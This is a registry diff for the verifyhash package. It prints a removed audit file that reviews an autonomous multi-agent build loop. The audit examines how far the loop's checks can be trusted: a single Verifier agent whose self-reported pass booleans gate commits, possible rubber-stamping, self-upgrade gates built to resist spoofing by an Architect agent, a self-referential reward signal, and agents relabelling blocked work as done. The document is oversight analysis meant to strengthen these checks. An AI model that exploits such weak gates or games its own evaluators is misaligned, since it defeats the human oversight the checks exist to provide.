verifyhash 0.1.0 → 0.1.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +5 -3
- package/cli/agent-hook.js +431 -0
- package/docs/ADOPT.md +15 -5
- package/docs/AGENT-HOOK.md +111 -0
- package/docs/ANCHORING.md +43 -22
- package/docs/PUBLISH-VERIFY-VH.md +45 -0
- package/examples/README.md +185 -0
- package/examples/policy.lenient.json +5 -0
- package/examples/policy.strict.json +6 -0
- package/examples/run.js +366 -0
- package/examples/sample-dataset/README.txt +10 -0
- package/examples/sample-dataset/corpus/cc-by-poem.txt +8 -0
- package/examples/sample-dataset/corpus/mit-notes.txt +4 -0
- package/examples/sample-dataset/data/unlabeled.txt +5 -0
- package/examples/sample-dataset/vendored/gpl-snippet.txt +5 -0
- package/examples/sample-dataset.hints.json +7 -0
- package/examples/sample-parcel/data/manifest-of-contents.txt +7 -0
- package/examples/sample-parcel/data/records.csv +4 -0
- package/examples/sample-parcel/delivery-note.txt +9 -0
- package/package.json +26 -3
- package/verifier/README.md +584 -0
- package/verifier/action/README.md +87 -0
- package/verifier/action/action.yml +146 -0
- package/verifier/build-standalone-html.js +1287 -0
- package/verifier/build-standalone.js +989 -0
- package/verifier/ci/journal.generic.sh +96 -0
- package/verifier/ci/journal.github-actions.yml +99 -0
- package/verifier/ci/reproduce-vh.generic.sh +59 -0
- package/verifier/ci/reproduce-vh.github-actions.yml +49 -0
- package/verifier/ci/verify-service.generic.sh +96 -0
- package/verifier/ci/verify-service.github-actions.yml +88 -0
- package/verifier/ci/verify-vh.generic.sh +75 -0
- package/verifier/ci/verify-vh.github-actions.yml +56 -0
- package/verifier/dist/BUILD-PROVENANCE.json +210 -0
- package/verifier/dist/seal-vh-standalone.js +876 -0
- package/verifier/dist/seal-vh-standalone.js.sha256 +1 -0
- package/verifier/dist/verify-vh-standalone.html +3373 -0
- package/verifier/dist/verify-vh-standalone.html.sha256 +1 -0
- package/verifier/dist/verify-vh-standalone.js +5123 -0
- package/verifier/dist/verify-vh-standalone.js.sha256 +1 -0
- package/verifier/lib/canonical.js +141 -0
- package/verifier/lib/keccak.js +30 -0
- package/verifier/lib/keccak256-vendored.js +206 -0
- package/verifier/lib/merkle.js +145 -0
- package/verifier/lib/revocation-core.js +606 -0
- package/verifier/lib/revocation.js +200 -0
- package/verifier/lib/seal-cli.js +374 -0
- package/verifier/lib/seal-evidence.js +237 -0
- package/verifier/lib/secp256k1-recover.js +249 -0
- package/verifier/package.json +39 -0
- package/verifier/verify-vh.js +3376 -0
- package/docs/ADOPTION.json +0 -11
- package/docs/AUDIT.md +0 -55
- package/docs/DECIDE.md +0 -47
- package/docs/DECISIONS-PENDING.md +0 -27
- package/docs/DEPLOY-PUBLIC-SITE.md +0 -301
- package/docs/ENGINE-LEDGER.json +0 -12
- package/docs/LOOP-AUDIT-2026-07-03.json +0 -580
- package/docs/LOOP-HARDENING-PLAN.md +0 -44
- package/docs/METRICS.jsonl +0 -31
- package/docs/MORNING.md +0 -204
- package/docs/STRATEGY-ARCHIVE.md +0 -5055
- package/docs/SUPERVISOR-RUNBOOK.md +0 -52
- package/docs/USAGE-BUDGET.json +0 -121
|
@@ -1,580 +0,0 @@
|
|
|
1
|
-
{
|
|
2
|
-
"summary": "Independent multi-dimension audit of the verifyhash autonomous build loop: engine, verification integrity, strategy value, economics, self-mod safety, supervision, outside-skeptic",
|
|
3
|
-
"agentCount": 7,
|
|
4
|
-
"logs": [
|
|
5
|
-
"reviews complete: 7/7 returned"
|
|
6
|
-
],
|
|
7
|
-
"result": {
|
|
8
|
-
"reviews": [
|
|
9
|
-
{
|
|
10
|
-
"area": "Engine Architecture (build-loop.workflow.js)",
|
|
11
|
-
"grade": "B",
|
|
12
|
-
"working_well": [
|
|
13
|
-
"Failure isolation is genuinely well-engineered: every agent call site is either try/caught or null-filtered. Planner throws degrade to dead rounds with a 2-strike exit (build-loop.workflow.js:371-380), decider/strategist throws don't abort (392, 400), build/verify throws become failed attempts then BLOCK (421-429), and one reviewer throwing is dropped via .catch(...)=>null + .filter(Boolean) so it can't veto an already-verified build (455-456). A single bad agent genuinely cannot wedge or corrupt a run.",
|
|
14
|
-
"Model pins are now fully explicit at every call site (engine #23) — roster=haiku(330), preflight/plan/decide/verify/manager/gatekeeper=opus, strategize/architect=fable(399,667), build attempt1=fable else opus(419), integrate/block=haiku(437,532,571). I found NO call site that silently inherits the session model.",
|
|
15
|
-
"The self-upgrade gates are real, not theatre. validate-driver.cjs strips comments AND string literals before checking protected invariants (stripCodeOnly, lines 21-40), so the correctness gate can't be spoofed by leaving 'verdict.pass && verdict.testsPass' in a comment; it also requires the gate be used as a conditional (55-57). smoke-driver.cjs actually executes the candidate with FAIL_VERIFY and asserts no commit is emitted (header lines 1-7).",
|
|
16
|
-
"endReason accuracy (a named pending finding) is FIXED and correct: 'iters' now means iter===MAX_ITERS only; fall-through with iter<MAX_ITERS is relabeled 'drained' (line 588) and round-cap exhaustion 'rounds' (line 578).",
|
|
17
|
-
"The rework path degrades safely: the verified pre-rework build/verdict are snapshotted (line 516) and a rework that breaks verification falls back to the last green build and still commits (525-535) rather than throwing away verified value."
|
|
18
|
-
],
|
|
19
|
-
"problems": [
|
|
20
|
-
{
|
|
21
|
-
"title": "No per-agent or wall-clock timeout anywhere — a hung agent wedges the entire run indefinitely",
|
|
22
|
-
"evidence": "Every agent() call (e.g. build-loop.workflow.js:419-420, 450-452, 663) passes only {label,phase,schema,model}; no timeout option exists. The resilience story only catches THROWS (try/catch at 421, 518). A hang is not a throw.",
|
|
23
|
-
"impact": "The loop's only bounds are budget.remaining()<80000 (365) and iteration caps. If any agent stalls without erroring, the run blocks forever, never reaching Manager/Report/Architect — the exact self-perpetuating failure the try/catch blocks were written to prevent, just via hang instead of throw.",
|
|
24
|
-
"fix": "Add a timeout to the agent primitive (or wrap each call in Promise.race with a deadline) and treat a timeout as a caught failed attempt, identical to the existing throw path.",
|
|
25
|
-
"priority": "P1"
|
|
26
|
-
},
|
|
27
|
-
{
|
|
28
|
-
"title": "driver-writes-METRICS still unfixed: the authoritative telemetry line is written by an Opus agent, not the driver",
|
|
29
|
-
"evidence": "The driver computes the entire stats string itself (build-loop.workflow.js:661), then hands it to reporterPrompt on model:'opus' (663) whose prompt (266-274) is a 4-line plea to 'COPY VERBATIM… do NOT recompute, infer, normalize, round, correct'.",
|
|
30
|
-
"impact": "The one cross-run signal every other role reads (avg/minUsefulness, endReason, humanGated) can be silently mangled by the reporter, and it burns an Opus call to append one pre-computed line plus a prose MORNING.md. Constraint: the driver has no file-I/O primitive (smoke-driver injects only agent/parallel/phase/log/args/budget, line 43), so a true driver-write needs the harness to expose a write primitive.",
|
|
31
|
-
"fix": "Expose a file-write primitive to the driver and have it append the METRICS line itself; until then, at minimum drop the reporter agent from opus to haiku since its job is a verbatim append plus a prose summary.",
|
|
32
|
-
"priority": "P1"
|
|
33
|
-
},
|
|
34
|
-
{
|
|
35
|
-
"title": "All numeric telemetry analysis is outsourced to LLM prose — root cause behind qualityStall duplication AND the hot-read-slicing finding",
|
|
36
|
-
"evidence": "qualityStall is computed by the preflight AGENT via 17 lines of prose arithmetic (build-loop.workflow.js:146-162) then RE-DERIVED by the strategist agent in prose (183-189). hot-read slicing is still unfixed: preflight (144), strategist (189), manager (249), architect (281) each independently 'read the last ~5/6 lines of METRICS.jsonl' themselves. The driver never reads METRICS at all.",
|
|
37
|
-
"impact": "The same 5 lines are re-tailed by 4+ agents per run, each trusted to slice correctly (fine at 31 lines/5.6KB today, unbounded as it grows), and the stall math lives in two prose copies that can drift.",
|
|
38
|
-
"fix": "Give the driver a file-read primitive; slice the last N METRICS lines once, compute qualityStall in code, and inject both into the reader prompts instead of instructing each agent to read+tail+re-derive.",
|
|
39
|
-
"priority": "P2"
|
|
40
|
-
},
|
|
41
|
-
{
|
|
42
|
-
"title": "git add -A at integrate sweeps unrelated uncommitted edits into task commits; end-phase edits are left uncommitted for the next run",
|
|
43
|
-
"evidence": "integratePrompt runs `git add -A && git commit` (build-loop.workflow.js:301). Strategist/Decider edit BACKLOG.md/STRATEGY.md in earlier rounds (204, 174-176). Manager (team.json, 263), Reporter (METRICS/MORNING, 267-273) and Architect/Gatekeeper (engine swap, 295) all write AFTER the final integrate with no commit — recovered only by the next run's Preflight 'wip: recover uncommitted changes' catch-all (141-142).",
|
|
44
|
-
"impact": "Commits contain cross-task bleed, and every run's own telemetry/team/engine changes are committed by the following run (or a human reconcile, e.g. c177de7) rather than atomically — fragile git history, and a run that dies after integrate leaves these changes dangling.",
|
|
45
|
-
"fix": "Scope the integrate commit to the task's filesChanged and add an explicit end-of-run commit for METRICS/MORNING/team/engine after the Report/Architect phases.",
|
|
46
|
-
"priority": "P2"
|
|
47
|
-
},
|
|
48
|
-
{
|
|
49
|
-
"title": "No checkpointing or partial-run resume: a crash before the Report phase loses all telemetry for the run",
|
|
50
|
-
"evidence": "results/newlyPlanned/reworkEvents are in-memory only (build-loop.workflow.js:353-356); METRICS is written once at the very end (663). Any unhandled failure or hang before Report means the run leaves committed code in git but zero METRICS/MORNING record.",
|
|
51
|
-
"impact": "The cross-run signal the Strategist/Manager/Architect depend on has silent holes exactly when a run fails — the runs most worth diagnosing are the ones that vanish from telemetry.",
|
|
52
|
-
"fix": "Append a partial METRICS line incrementally (or a checkpoint file) as each task integrates, so a crashed run still records what it built.",
|
|
53
|
-
"priority": "P2"
|
|
54
|
-
},
|
|
55
|
-
{
|
|
56
|
-
"title": "Prompt bloat: the same quality-stall instruction is restated 3-4 times per prompt, paid on every run across ~8 VISION-carrying calls",
|
|
57
|
-
"evidence": "strategistPrompt (build-loop.workflow.js:178-206) states the quality-stall directive as the mechanical flag, THEN 'still confirm against the data', THEN re-derives the avgUsefulness comparison in prose, THEN 'flat-and-mediocre' again — ~28 lines for one instruction. VISION (29-58) is injected into decider, strategist, builder, reviewer×5, manager, architect.",
|
|
58
|
-
"impact": "Redundant tokens on every agent call, every run — recurring spend against the 120M/week governor with no behavioral gain over a tight single statement.",
|
|
59
|
-
"fix": "Collapse the qualityStall guidance to one sentence (the flag is already computed) and trim VISION to the guardrails agents actually act on.",
|
|
60
|
-
"priority": "P3"
|
|
61
|
-
},
|
|
62
|
-
{
|
|
63
|
-
"title": "Historical comments assert a premise the live METRICS contradicts; 100% first-shot verify hints the Verifier is a weak gate",
|
|
64
|
-
"evidence": "Comments at build-loop.workflow.js:357-360, 490, 636 reason from 'verified pinned at exactly 4 for 10-11 runs while MAX_ITERS=8', but METRICS shows verified=8 on ~10 of the last 12 runs. The two most recent runs log fableFirstShots:8 / fableFirstShotVerified:8 — 100% first-attempt verify pass.",
|
|
65
|
-
"impact": "The endReason-honesty and panelSize rationales are anchored to an obsolete state. An 8/8 first-shot verify rate where the same loop authors task, tests, and acceptance criteria suggests the independent Verifier is closer to a rubber stamp than an adversarial gate — undermining 'verified' as a value signal.",
|
|
66
|
-
"fix": "Prune stale premises from comments and add telemetry on how often the Verifier actually fails an attempt (currently invisible) to confirm the gate has teeth.",
|
|
67
|
-
"priority": "P3"
|
|
68
|
-
}
|
|
69
|
-
],
|
|
70
|
-
"summary": "The engine is a competently built autonomous orchestrator whose standout strengths are failure isolation (every agent call is caught or null-filtered so no single agent can wedge or corrupt a run) and a genuinely non-trivial two-gate self-upgrade path with comment/string-stripping to prevent spoofing. Model pins are fully explicit with no silent inheritance, and the named endReason finding is correctly fixed. The dominant weakness is that the driver owns no file I/O, so it outsources all telemetry reading, writing, and trend arithmetic to LLM prose — this single gap is the root of three separate issues: driver-writes-METRICS (still unfixed, an Opus agent begged to copy a string verbatim), hot-read slicing (still unfixed, 4+ agents re-tail METRICS each run), and a qualityStall computation duplicated across two agents. Beyond that, the absence of any per-agent timeout means a hung (not thrown) agent defeats the otherwise-careful resilience design, and there is no checkpoint/resume so a crash before the final Report phase erases the run from telemetry entirely."
|
|
71
|
-
},
|
|
72
|
-
{
|
|
73
|
-
"area": "Verification Integrity — can bad work get marked VERIFIED?",
|
|
74
|
-
"grade": "C+",
|
|
75
|
-
"summary": "The pipeline has real structural separation — Builder, a single independent Verifier, a usefulness panel, and a separate Integrator that writes the VERIFIED flip only after the driver's gate passes — and my spot-check (T-70.1: 37 genuine passing tests, real fail-closed assertions) shows the work being shipped is honest, well-tested code. BUT the correctness gate is architecturally soft: the engine NEVER runs the 3981-test suite itself. The only thing standing between bad work and a VERIFIED commit is one Opus agent's self-reported `verdict.pass && verdict.testsPass` booleans (build-loop.workflow.js:430,434) — there is zero mechanical execution or exit-code check. So bad work CAN in principle be marked VERIFIED if the Verifier hallucinates or skips the run; the system substitutes agent honesty for a mechanism, which is a notable gap for a product whose whole thesis is \"don't trust, verify.\" The recurring BLOCKED-but-actually-done bug (T-46.1/T-61.1/T-63.1) is unfixed and exposes the recording pipeline's fragility, and the median aggregation deliberately hides lone hard dissent.",
|
|
76
|
-
"working_well": [
|
|
77
|
-
"Builder cannot self-mark VERIFIED: the flip is written by a separate Integrator agent (integratePrompt, line 300-310; invoked line 571/532) and ONLY after the driver's own gate `verdict.pass && verdict.testsPass` evaluates true (line 430/434). The Builder's self-reported `testsPass` (BUILD_SCHEMA) is NOT the gate — only the independent Verifier's verdict is.",
|
|
78
|
-
"The Verifier is genuinely independent of the Builder and instructed to distrust it (verifierPrompt line 227: 'trust nothing it claims'; step 4 'hunt for cheats — empty assertions, faked criteria, broken unrelated tests').",
|
|
79
|
-
"The gate is a protected invariant the Architect cannot silently remove: scripts/validate-driver.cjs:52-58 hard-fails any candidate engine where the literal `verdict.pass && verdict.testsPass` is absent from executable code or not used as a conditional guard.",
|
|
80
|
-
"The work is real. Spot-check of VERIFIED T-70.1 (cli/core/anchor-binding.js) ran green — 37 passing tests with substantive fail-closed/totality/hostile-input assertions, not empty stubs.",
|
|
81
|
-
"The Verifier does in practice catch a red full suite: the T-63.1 episode (BACKLOG.md:4457) shows it blocked a task because 16 UNRELATED tests were failing — evidence the full-suite instruction is being honored, not skipped.",
|
|
82
|
-
"Rework degrades safely: a rework that breaks verification falls back to the already-verified pre-rework build (line 525-536) rather than destroying verified value, and makes exactly one repair attempt (no unbounded loop)."
|
|
83
|
-
],
|
|
84
|
-
"problems": [
|
|
85
|
-
{
|
|
86
|
-
"title": "The 3981-test suite gates nothing mechanically — the commit gate is a single LLM's self-reported boolean",
|
|
87
|
-
"evidence": "build-loop.workflow.js:430 `if (verdict && verdict.pass && verdict.testsPass) break` and :434 are the ONLY gate; `verdict` comes from VERIFY_SCHEMA (line 109-113) — LLM structured output. grep for `hardhat|exec|spawn|child_process` across build-loop.workflow.js + scripts/validate-driver.cjs + scripts/smoke-driver.cjs returns ONLY prompt-string mentions (TEST_CMD line 27, builderPrompt line 218). The engine never runs `npx hardhat test` or checks an exit code.",
|
|
88
|
-
"impact": "If the Verifier agent hallucinates testsPass:true, runs only a subset despite instructions, or errors in a way that yields an optimistic object, bad/red work commits and is flipped to VERIFIED. For a product whose entire value proposition is mechanical tamper-evidence, the build loop's own correctness gate rests on trust, not verification — the exact anti-pattern the product sells against.",
|
|
89
|
-
"fix": "Have the DRIVER (not an agent) run the test command and capture the real exit code, then AND it into the gate: `const suiteGreen = runShell(TEST_CMD).code===0; if (verdict.pass && suiteGreen) …`. Keep the Verifier for acceptance-criterion judgement, but make the pass/fail of the suite a mechanical fact the engine observes, and add a validate-driver invariant requiring it.",
|
|
90
|
-
"priority": "P1"
|
|
91
|
-
},
|
|
92
|
-
{
|
|
93
|
-
"title": "Recurring BLOCKED-but-actually-COMPLETE mislabel (T-46.1/T-61.1/T-63.1) is unfixed at the engine level",
|
|
94
|
-
"evidence": "Two root causes both still live: (1) an agent THROW routes straight to BLOCKED (line 421-429 sets verdict=null → line 434 BLOCK) even when the Builder already wrote correct code; (2) the full-suite gate means UNRELATED breakage blocks a perfect task — T-63.1 (BACKLOG.md:4457) was blocked because STRATEGY.md exceeded a doc-size test budget (16 failures in strategy.archive/size-guard, ZERO in the task's own code). The Builder's files remain in the working tree and the NEXT run's preflight commits them as 'wip: recover uncommitted changes' (preflightPrompt line 141), so the artifact lands in git while BACKLOG says BLOCKED. Each of the 3 needed a manual Decider reconcile.",
|
|
95
|
-
"impact": "The landing/recording pipeline can permanently mislabel completed, tested work as failed, stalling dependents and requiring human reconciliation. It also proves the correctness gate is coupled to self-inflicted, unrelated doc-rot state — any task can be blocked by breakage it did not cause.",
|
|
96
|
-
"fix": "On an agent throw, distinguish 'infrastructure error' from 'genuine criteria failure' — retry or mark NEEDS-RECONCILE, not BLOCKED, and never leave completed work uncommitted-but-blocked. Separately, scope the acceptance gate so a task fails only on regressions it introduced (baseline the suite before the build; compare deltas) rather than on pre-existing unrelated red.",
|
|
97
|
-
"priority": "P1"
|
|
98
|
-
},
|
|
99
|
-
{
|
|
100
|
-
"title": "Median aggregation silently suppresses a lone hard dissent on usefulness",
|
|
101
|
-
"evidence": "median([5,5,5,5,2]) = 5 (line 326, 478). The usefulness-floor rework trigger keys on the MEDIAN (line 505 `usefulness <= 3`), so a reviewer scoring a deliverable 2/5 while the other four say 5 produces recorded usefulness 5 AND triggers no rework. A lone dissenter can only force a repair by ALSO setting needsRework=true (line 457) — a separate boolean. Dissent expressed purely as a low score is invisible.",
|
|
102
|
-
"impact": "A single reviewer who correctly identifies a task as near-useless or subtly wrong is overridden with no trace in METRICS and no rework pass. The engine #22 comment (line 459-475) intends this to kill a panel-width artifact, but the side effect is that genuine minority-correct dissent on the value axis is discarded.",
|
|
103
|
-
"fix": "Keep median for the trend metric but preserve dissent as a signal: trigger the rework/repair path when ANY reviewer scores <=2 (not just the median), OR record both median and min in METRICS so a suppressed hard dissent stays visible cross-run.",
|
|
104
|
-
"priority": "P2"
|
|
105
|
-
},
|
|
106
|
-
{
|
|
107
|
-
"title": "Verifier and review panel both see the Builder's self-summary — not blind-independent",
|
|
108
|
-
"evidence": "verifierPrompt line 231 injects `Builder reported: ${build.summary}`; reviewerPrompt line 241 injects `Builder summary: ${build.summary}`. Neither judges the diff blind.",
|
|
109
|
-
"impact": "Anchoring bias: the Builder's framing ('this correctly handles X, all criteria met') primes the very agents meant to independently confirm it. The 'trust nothing it claims' instruction mitigates but cannot eliminate framing effects, and there is exactly ONE correctness checker (no correctness panel) — a single anchored point of failure for the whole gate.",
|
|
110
|
-
"fix": "Give the Verifier the task acceptance criteria and the diff WITHOUT the Builder's prose conclusion (or provide the summary only as 'unverified claims to check against', already partly the intent). Consider a second independent verifier for shared-core/contract changes.",
|
|
111
|
-
"priority": "P2"
|
|
112
|
-
},
|
|
113
|
-
{
|
|
114
|
-
"title": "100% first-attempt verify pass rate is an un-investigated leniency signal",
|
|
115
|
-
"evidence": "docs/METRICS.jsonl last two runs: fableFirstShots:8/fableFirstShotVerified:8 (2026-07-02 08:25) and 8/8 (2026-07-02 18:51). Every task passed the independent Verifier on attempt 1 with no retry, two runs running.",
|
|
116
|
-
"impact": "Either the tasks are so incremental that verification is trivial (the qualityStall/plateau the loop itself keeps flagging — avgUsefulness clustering ~3.75, min stuck at 3), or the Verifier is rubber-stamping. Both undermine the gate's value: a gate that never rejects is not measurably gating.",
|
|
117
|
-
"fix": "Add a periodic adversarial calibration: inject a deliberately-broken build (mutation test / known-red diff) and confirm the Verifier fails it. If it passes a planted-red build, the gate is decorative.",
|
|
118
|
-
"priority": "P2"
|
|
119
|
-
},
|
|
120
|
-
{
|
|
121
|
-
"title": "STRATEGY.md sits 514 bytes from a suite-reddening cliff that the Strategist appends to every run",
|
|
122
|
-
"evidence": "`stat STRATEGY.md` = 81406 bytes; test/strategy.size-guard.test.js:98 caps at SIZE_BUDGET.MAX_BYTES and test/strategy.archive.test.js:260 caps at 80*1024=81920. The Strategist appends a dated '## Direction' entry nearly every run (strategistPrompt line 203-205).",
|
|
123
|
-
"impact": "One ordinary Strategist append pushes the ENTIRE suite red, which (via the full-suite gate) blocks the run's unrelated tasks — this is precisely what already happened in T-63.1. A self-inflicted, recurring correctness-gate outage is armed and one commit away.",
|
|
124
|
-
"fix": "Make the size-budget self-heal (archive-direction.cjs) run in preflight BEFORE any build, or exclude doc-size invariants from the per-task acceptance gate so document housekeeping cannot block product tasks.",
|
|
125
|
-
"priority": "P2"
|
|
126
|
-
},
|
|
127
|
-
{
|
|
128
|
-
"title": "Dissenter-only re-score merges stale votes cast on the pre-rework code",
|
|
129
|
-
"evidence": "build-loop.workflow.js:557-561: after successful rework, only `dissenters` re-vote; satisfied reviewers' ORIGINAL votes (cast on the OLD code) are merged via `mergedVotes` and collapsed through median. The satisfied reviewers never see the amended artifact.",
|
|
130
|
-
"impact": "If the rework introduces a defect that a previously-satisfied reviewer would have caught, it is missed — their stale 5/5 stands on code they never saw. The recorded post-rework usefulness can therefore over-state the amended deliverable. Cost-motivated (engine #24 saved ~10-20 Opus calls/run), but trades correctness for tokens.",
|
|
131
|
-
"fix": "At minimum re-run the full panel on reworks that touch shared-core/contract files; for narrow doc/test reworks the dissenter-only path is acceptable. Gate the shortcut on the diff's blast radius, not unconditionally.",
|
|
132
|
-
"priority": "P3"
|
|
133
|
-
}
|
|
134
|
-
]
|
|
135
|
-
},
|
|
136
|
-
{
|
|
137
|
-
"area": "STRATEGY & VALUE",
|
|
138
|
-
"grade": "C",
|
|
139
|
-
"summary": "The loop is building MORE things, not the RIGHT things — 11 EPICs (61–71) in ~4 days, all in the same trust/provenance vertical, with zero external adoption signal anywhere in the system. The damning detail is that the loop DIAGNOSED this precisely (EPIC-61's own charter says \"building more IS the stall\" and names the humanGated=3 ceiling as a GTM mismatch) and then shipped ten more capability EPICs (62–71). The machinery to recognize stagnation exists and once genuinely fired (qualityStall → EPIC-61 pivot), and a few artifacts (P-1's decidability, the self-serve Stripe path, verifyhash.com) point at revenue — but the reward signal is entirely self-referential (a 5-reviewer panel rating \"usefulness & design quality\" by reading its own changed files), so novelty reliably satisfies the brake and the loop never feels the absence of users.",
|
|
140
|
-
"working_well": [
|
|
141
|
-
"qualityStall is a real, mechanically-computed brake (build-loop.workflow.js:145-162, four clauses) that HAS fired and produced a genuine strategic pivot: EPIC-61's charter explicitly cites 'The qualityStall flag FIRED and humanGated has been pinned at 3 for ~20 runs' and pivots from capability-building to a first-dollar convergence — the brake is not decorative.",
|
|
142
|
-
"P-1 (token framing, STRATEGY.md:198-226) is genuinely decision-ready: crisp A/B options, honest pros/cons, a stated recommended default (soulbound/Option A), and a clear scope (gates only EPIC-3). This is what a decidable proposal should look like.",
|
|
143
|
-
"The self-serve revenue path is actually built, not just proposed: go-live-preflight (EPIC-61), fulfill-webhook (EPIC-62), plan catalogs + `license fulfill`, a free-vs-paid gate, and docs/ADOPT.md — the human's remaining work is genuinely reduced to key+price+Stripe rather than code.",
|
|
144
|
-
"Honest boundary discipline is consistent and real: every timestamp/trust claim is repeatedly qualified as 'ts is self-asserted, NOT a trusted timestamp without P-3' (e.g. P-9 integrity-journal sub-note, STRATEGY.md:712-716). The loop does not overclaim what it built.",
|
|
145
|
-
"P-8's 2026-06-26 sharpening (STRATEGY.md:620-654) is legitimately good GTM thinking: pick the lighter-gated vertical (evidence) first, one concrete buyer archetype, a 3-step no-slide-deck first contact, and a 2-week time box with an explicit 'if zero, switch channel not build more product' exit."
|
|
146
|
-
],
|
|
147
|
-
"problems": [
|
|
148
|
-
{
|
|
149
|
-
"title": "The usefulness panel rewards self-assessed novelty; nothing in the entire system measures adoption or revenue",
|
|
150
|
-
"evidence": "The Critic lens is literally 'overall usefulness & design quality' (build-loop.workflow.js:136); reviewers 'judge it ONLY through your lens. Read the changed files' (line 240) — the score is an internal code-quality judgment. METRICS.jsonl tracks verified/avgUsefulness/minUsefulness/humanGated only; no field tracks downloads, users, or dollars. Product has zero users/revenue after 290+ commits and this is invisible to every gate.",
|
|
151
|
-
"impact": "The loop cannot distinguish 'shipped genuine value' from 'shipped a clean new CLI verb nobody wants.' Recent avgUsefulness recovered 2.5→3.88→4.13 (METRICS 2026-06-26..07-02) specifically by 'launching a genuinely new on-market vertical' (AGENTTRACE) — i.e. the panel rewarded pure novelty, which is exactly the failure mode.",
|
|
152
|
-
"fix": "Add an external-signal input the panel/qualityStall must weigh: even a manually-updated docs/ADOPTION.json (downloads, pilot count, first-dollar Y/N) that a strategist prompt reads. Until an external number moves, cap any brand-new-vertical EPIC's reward. Novelty with zero adoption should score LOW, not 4/5.",
|
|
153
|
-
"priority": "P1"
|
|
154
|
-
},
|
|
155
|
-
{
|
|
156
|
-
"title": "EPIC inflation: 11 EPICs in ~4 days, all one vertical, after the loop itself concluded 'building more IS the stall'",
|
|
157
|
-
"evidence": "EPICs 61–71 all dated 2026-07-01→07-03, all trust/provenance (BACKLOG headers). EPIC-61's charter (BACKLOG.md:4394) states the capability surface is 'exhaustively shipped and green — 19K CLI lines, 145 test files, ~15 verticals... There is no unbuilt capability worth adding on this axis; building more IS the stall.' The loop then created EPIC 62,63,64,65,66,67,68,69,70,71 anyway. The latest Direction note (STRATEGY.md:113-131) proposes yet two more (EPIC-70/71).",
|
|
158
|
-
"impact": "Effort compounds on an axis with proven zero marginal value while the actual bottleneck (a human GTM action) is untouched. The backlog is now ~72 EPICs; STRATEGY.md is 757 lines and required a purpose-built auto-archiver + size-guard (the T-63.1 decision) to manage bloat it keeps generating.",
|
|
159
|
-
"fix": "Give the Strategist a hard 'frontier is saturated' state: when humanGated has been pinned N runs AND capability count exceeds a threshold, the only legal outputs are (a) a non-code distribution task (npm pack-and-install smoke, funnel page) or (b) return newTasks:[] and idle. Forbid opening a new vertical while an existing built vertical has zero users.",
|
|
160
|
-
"priority": "P0"
|
|
161
|
-
},
|
|
162
|
-
{
|
|
163
|
-
"title": "The ~11 needs-human proposals are mostly the SAME 2-3 asks repeated per-vertical, buried in unreadable walls of text",
|
|
164
|
-
"evidence": "P-8 itself admits 'the SAME precondition is buried in each [P-3,P-5,P-6,P-7]... a human could not see that ONE pilot satisfies all four' (STRATEGY.md:562-565). 'Land a design partner' recurs in P-4, P-5#3, P-6#3, P-7#3, P-8. 'Pick price + free/paid split' recurs in P-6, P-7, P-9, P-10. 'Provision vendor key' recurs in P-3, P-6#1, P-7#1. P-3 spans ~75 lines with 5 stacked UPDATE blocks; P-8 spans ~100 lines with nested SHARPENING/POINTER layers.",
|
|
165
|
-
"impact": "Genuinely distinct revenue decisions number ~3 (provision-key+price+Stripe/npm; land-a-partner; token framing), but are presented as 11 proposals a human must parse. 'Decision-ready' prose has ballooned into the opposite of decidable — a 100-line proposal cannot be acted on quickly, defeating the stated goal.",
|
|
166
|
-
"fix": "Enforce a proposal length cap and a one-line 'THE DECISION:' + 'RECOMMENDED:' header per proposal (P-1's format). Collapse P-4/P-5/P-6/P-7 delivery asks into P-8 and DELETE the duplicated bodies rather than cross-referencing them. Append UPDATE notes to a changelog, not the proposal body.",
|
|
167
|
-
"priority": "P1"
|
|
168
|
-
},
|
|
169
|
-
{
|
|
170
|
-
"title": "qualityStall measures panel morale, and the engine was tuned to make it fire LESS, not to measure value better",
|
|
171
|
-
"evidence": "The median-over-min aggregation change (build-loop.workflow.js:459-478) was made explicitly so 'a SINGLE harsh reviewer' no longer floors a task and the stall stops firing on 'four 5s and one 2.' Combined with the panel being self-referential, the brake clears whenever the majority of reviewers like the code — which a shiny new vertical reliably achieves (avg back to 4.13). qualityStall fired once (→EPIC-61) but the subsequent ten EPICs prove it has no teeth against the core build-more behavior.",
|
|
172
|
-
"impact": "The one self-braking mechanism is satisfiable by the exact behavior it should suppress. It brakes on reviewer pessimism, not on real-world non-adoption, so it will never stop a stream of well-built, unwanted features.",
|
|
173
|
-
"fix": "Keep median for correctness noise, but add an orthogonal 'novelty-without-adoption' penalty that median cannot wash out: if a task opens a new vertical/verb and ADOPTION signal is unchanged, force minUsefulness contribution ≤2 regardless of panel. Tie qualityStall to the external signal, not only to internal votes.",
|
|
174
|
-
"priority": "P1"
|
|
175
|
-
},
|
|
176
|
-
{
|
|
177
|
-
"title": "The right next steps for first revenue are non-code and the loop cannot represent 'stop and hand off' as an outcome",
|
|
178
|
-
"evidence": "Every run ends with newTasks and new EPICs; endReason is 'iters' or 'frontier' but never 'handoff-blocked' (METRICS.jsonl). The lowest-friction first-dollar path per the loop's own EPIC-61 analysis is human-only (provision key, set price, wire Stripe, npm publish P-9 step 1). No EPIC can cross that, yet the loop substitutes EPIC 68-71 (new CLI: vh agent, anchor-artifact, agenttrace-coverage) instead of idling.",
|
|
179
|
-
"impact": "The three highest-leverage moves toward first users — (1) publish to npm + a clean-room `npx verifyhash` install smoke test to make P-9 a one-command human step, (2) one polished converting funnel surface on the already-live verifyhash.com (extend EPIC-66's in-browser challenge into the landing path), (3) actually running the P-8 evidence pilot — are respectively barely-touched, partial, and human-only. The backlog does NOT contain a 'get the first user' EPIC because the loop treats non-buildable work as out of scope rather than as the priority.",
|
|
180
|
-
"fix": "Make 'return newTasks:[] and idle with a single sharpened handoff' a first-class, rewarded Strategist outcome when the frontier is GTM-blocked. Before opening any new vertical, require the distribution prerequisites (published package, working funnel link) to be DONE. Prioritize the two buildable distribution tasks above over any new verb.",
|
|
181
|
-
"priority": "P0"
|
|
182
|
-
},
|
|
183
|
-
{
|
|
184
|
-
"title": "'Reconcile not rebuild' pattern lets the loop self-grade stuck work as done",
|
|
185
|
-
"evidence": "Three Decider entries (T-46.1, T-61.1, T-63.1 — STRATEGY.md:16-77) each take a task BLOCKED after 3 auto-build failures and flip it BLOCKED→TODO/verify-only by declaring 'the artifact ALREADY EXISTS' and rewriting acceptance into 'verify-only checks.' The rationale each time: 'a broken X could not produce a green test suite.'",
|
|
186
|
-
